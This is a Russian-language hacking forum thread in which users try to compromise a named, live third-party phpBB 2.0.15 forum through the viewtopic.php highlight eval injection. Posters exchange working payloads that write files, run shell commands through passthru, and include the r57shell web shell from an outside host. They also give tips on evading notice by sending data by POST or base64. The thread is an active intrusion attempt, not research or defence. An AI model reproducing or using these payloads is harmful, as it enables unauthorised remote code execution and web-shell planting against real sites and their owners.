Вопрос по уязвимости в viewtopic.php
 

somesite.ru
Вчера залез посмотреть про хитмана и обнаружил, что форум phpbb 2.0.15 .. =)
эксплоит работает, а fopen() и т.д. - нет.
делал так: viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight=' .eval($_GET[c]).'

ничего не работает, что посоветуете? :)
пробовал это же на локалхосте - гуд, почему там не работает?

кстати, там виндовс стоит - 2003 сервер, скорее всего
&highlight='.passthru(dir).' не пашет тоже.

[mod] Ссылки только в личке и Просьбах о взломах [/mod]

viewtopic.php?t=2206&highlight='.passthru(dir).'А может вот так правильней будет?

viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight=' .eval($_GET[c]).'

никогда так не делай.
Такие данные шли постом, а лучше в base64.
давай сцылку на форум, поможем

Я же написал в начале - somesite.ru - форум "нового диска" =)

[mod] Ссылки только в личке и Просьбах о взломах [/mod]

попробуй сам - не пашет

кроме phpinfo(); и раскрытия пути работает только эксплоит про пасс к базе форума

viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://rst.void.ru/download/r57shell.txt

Если не получится пробуй багу с регэкспами.